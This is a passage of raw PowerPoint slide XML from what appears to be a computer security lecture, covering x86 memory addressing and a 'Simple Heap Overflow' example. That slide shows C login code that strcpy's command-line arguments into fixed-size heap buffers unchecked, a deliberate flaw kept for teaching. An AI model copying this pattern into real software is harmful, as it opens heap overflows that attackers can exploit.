            <a:off x="325492" y="4731909"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171791" y="2246556"/>
            <a:ext cx="1390124" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5434685" y="4766535"/>
            <a:ext cx="864339" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>File </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655428" y="4407559"/>
            <a:ext cx="1015150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200020" y="3105159"/>
            <a:ext cx="1312679" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079178" y="4558785"/>
            <a:ext cx="477602" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7769498" y="4743451"/>
            <a:ext cx="774883" cy="891316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39337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6" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="5" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="23" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>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0" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Addressing Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - 8 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the contents of the memory pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, 2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>moves the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the memory at address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> * 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x804a0e4, %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the value 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> (0x804a0e4), %</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p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>copies the content of memory at address 0x804a0e4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51753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06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06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06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106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106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106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1069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1069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1069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1069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33220" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033221" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define BUFSIZE 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define DEBUG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int main(int argc, char* argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *passwd = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *username = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  struct passwd* entry = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *salt = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (argc &lt; 3) {...}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(username, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(passwd, argv[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  entry = getpwnam(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (entry == NULL) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "Wrong username %s\n”, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (strncmp(entry-&gt;pw_passwd, "$1$", 3)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "No MD5 password available\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033222" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> salt = entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, (char *)crypt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, salt))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, "Wrong password %s for user %s\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
